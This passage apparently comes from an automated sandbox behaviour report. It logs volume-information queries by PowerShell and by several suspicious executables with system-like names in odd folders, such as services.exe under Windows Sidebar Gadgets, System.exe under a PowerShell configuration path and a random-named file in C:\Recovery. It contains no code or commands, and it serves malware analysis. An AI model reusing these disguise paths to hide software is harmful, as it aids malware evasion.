                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                            Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\services.exeQueries volume information: C:\Program Files (x86)\Windows Sidebar\Gadgets\services.exe VolumeInformation
                            Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\services.exeQueries volume information: C:\Program Files (x86)\Windows Sidebar\Gadgets\services.exe VolumeInformation
                            Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Program Files (x86)\Windows NT\smartscreen.exeQueries volume information: C:\Program Files (x86)\Windows NT\smartscreen.exe VolumeInformation
                            Source: C:\Program Files (x86)\Windows NT\smartscreen.exeQueries volume information: C:\Program Files (x86)\Windows NT\smartscreen.exe VolumeInformation
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeQueries volume information: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe VolumeInformation
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeQueries volume information: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe VolumeInformation
                            Source: C:\Recovery\TItoGxsDkTEZBWdlQNGwopi.exeQueries volume information: C:\Recovery\TItoGxsDkTEZBWdlQNGwopi.exe VolumeInformation
                            Source: C:\Recovery\TItoGxsDkTEZBWdlQNGwopi.exeQueries volume information: C:\Recovery\TItoGxsDkTEZBWdlQNGwopi.exe VolumeInformation
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeQueries volume information: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe VolumeInformation
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeQueries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeQueries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeQueries volume information: C:\Windows\Fonts\Candaral.ttf VolumeInformation
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeQueries volume information: C:\Windows\Fonts\Candarali.ttf VolumeInformation
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeQueries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformation
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeQueries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformation
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation
